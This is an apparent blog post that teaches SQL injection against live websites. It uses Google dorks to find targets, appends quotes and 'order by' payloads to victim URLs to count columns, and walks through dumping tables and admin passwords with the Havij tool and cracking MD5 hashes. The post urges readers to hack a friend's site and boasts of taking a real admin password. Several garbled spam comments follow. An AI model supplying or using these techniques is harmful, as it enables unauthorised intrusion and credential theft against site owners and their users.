How to Find a vulnerable website?

Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks.

Small List of Google Dork:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:post.php?id=

inurl:article?id=

Download A large list of Google dork from here

copy one from above list and paste in google search box,hit enter

You can see list of websites ending with that url for eg:

http://www.victim.com/index.php?id=2

Go to that link.

add ‘ (single quote) at the end of the url.
For eg:
http://www.victim.com/index.php?id=2′

Now hit enter.

if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.

Now let’s check further. ( EXPLANATION- STEP 3    )

Remove single quote from url
Then add this “order by x” (without quotes)
replace the x with 0,1,2,….n.(until it show error page).

For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)

Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.

If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1– (no error)
http://www.victim.com/index.php?id=2 order by 2– (no error)
http://www.victim.com/index.php?id=2 order by 3– (no error)
http://www.victim.com/index.php?id=2 order by 4– (no error)
http://www.victim.com/index.php?id=2 order by 5–(error)

If this is also not working,then try this:

http://www.victim.com/index.php?id=2 and 1=2 order by 1– (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2– (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3– (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4– (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5–(error)

Note:
if you want to hack particular website like http://www.yourfriendwebsite.com, then go to that website. Find the
webpage that ends with any of google dorks list items.

If you think that the explanation given above after STEP3 is tough then follow this.
Download Free edition from Havij (In the same page, you can see the difference between free and professional edition). It is matter of what your target is.

  • Now you google with below options to find websites  vulnerable for targetting SQL Injection with Havij

inurl:index.php?id=
inurl:article.php?id=

Once you choose a website, type ‘ at the end like shown below and press enter. If you get an error, then the website is vulnerable to SQL Injection.

http://www.hackandsecure/site/content.php?vn=3&id=77′

1. Retrieve DB Information:
Copy and paste the target url in ‘Target’ column and click ‘Analyze’
Once Havij is successful in retrieving DB name, it will stop and you can see the database details either at the log window or ‘Info’ option. Havij will retrieve Web Server Type (Apache, IIS or other), DB Type (My SQL, MS SQL or other) and DB Name
Once this is successful, you can make sure that you are in right path i.e; your target is vulnerable to SQL Injection Attack.
2. Retrieve Tables:
Now you need to retrieve all table that contains user name and password to login to the website. Choose the db and Click ‘Get Tables’ option.
Here you go, now all the tables are retrieved from DB. You can either wait till it retrieves all the tables or you can just stop the top when you see any suspected table like one below. I stopped the processing when Havij found a table that I suspected to be containing user names and passwords for the website.
3. Retrieve Table Columns:
Before you start retrieving data of a specific table, you need to get the columns. So mark the suspected password table and click ‘Get Columns’ 
I am really sorry for marking all website specific details with red mark, I must do that to safeguard.
4. Retrieve User name and Password:
You are at final stage of hacking . Mark the database, table and columns to be retrieved and you have option of retrieving only one row. Choose ‘Get Data’  to let Havij give you member access to the site.
I am done now, luckily my target website didn’t store passwords encrypted and I have their website’s admin password. That’s it!
If the password is encrypted, Havij has inbuilt MD5 option where you can specify the MD5 hash to be cracked.  Havij will look for hash in several sites in mul thread mode and displays the result.
Advertisements

14 thoughts on “How to Find a vulnerable website?

  1. I’ll right away grasp your rss as I can’t in finding your e-mail subscription link
    or e-newsletter service. Do you’ve any? Kindly allow me realize in order that I may just subscribe. Thanks.

  2. Thanks for another informative web site. The place else could I am getting that type of info written in such an ideal method? I’ve a project that I am just now working on, and I’ve been at the glance out for such information.

  3. In That Location may be something in the vaccine mass media the first and final use?

    In the short term, there may be a hotfoot before March 18 for borrowers that silent want when
    and where? In plot for of the Stanley Cup final exams, the ChicagoBlackhawks
    didn’t inside datas, please furnish as much info as you can.

  4. He believed in them and that given the chance these people
    will repay the loans. Undeterred by his constant jailing, Xiaobo took his political ideas to the Internet, which he called “God’s gift
    to China”. s definition to include climate activism, human rights,
    and micro-financing.

  5. That, plus the added benefits and customization abilities that come with your own wordpress blog for example, makes the paid option a no-brainer for anyone that can afford it.
    re going to take a step-by-step look at how you can find and automatically install plugins directly from within Word – Press.
    Remember you can use WordPress as a regular website.

  6. Excellent goods from you, man. I’ve understand your stuff previous to and you are just too
    excellent. I really like what you’ve acquired here, certainly like what you’re stating and the way in which you say it.
    You make it entertaining and you still take care of
    to keep it sensible. I can not wait to read much more from you.
    This is actually a tremendous site.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s